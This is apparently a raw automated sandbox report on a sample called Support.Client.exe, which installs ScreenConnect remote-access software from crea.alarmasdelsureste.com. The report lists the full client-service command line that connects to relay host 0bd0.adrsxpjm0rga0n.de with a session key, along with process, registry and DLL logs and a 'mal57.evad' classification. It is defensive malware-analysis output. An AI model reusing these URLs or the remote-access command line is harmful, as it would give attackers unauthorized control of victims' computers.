                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.configT
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exeD
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Source: Support.Client.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C0A4950_2_00C0A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88AF4F1_2_00007FFD9B88AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8933A11_2_00007FFD9B8933A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B89A1AF1_2_00007FFD9B89A1AF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AB1351_2_00007FFD9B8AB135
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8927481_2_00007FFD9B892748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B89D5991_2_00007FFD9B89D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88F8911_2_00007FFD9B88F891
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8812111_2_00007FFD9B881211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A30F11_2_00007FFD9B8A30F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8861381_2_00007FFD9B886138
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A27681_2_00007FFD9B8A2768
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8870BD12_2_00007FFD9B8870BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8810CF12_2_00007FFD9B8810CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8810D712_2_00007FFD9B8810D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB969FB12_2_00007FFD9BB969FB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB958F112_2_00007FFD9BB958F1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                  Source: Support.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal57.evad.winEXE@17/74@2/2
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeCommand line argument: dfshim0_2_00C01000
                  Source: Support.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Support.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Support.Client.exeVirustotal: Detection: 20%
                  Source: unknownProcess created: C:\Users\user\Desktop\Support.Client.exe "C:\Users\user\Desktop\Support.Client.exe"
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User"
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User"
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
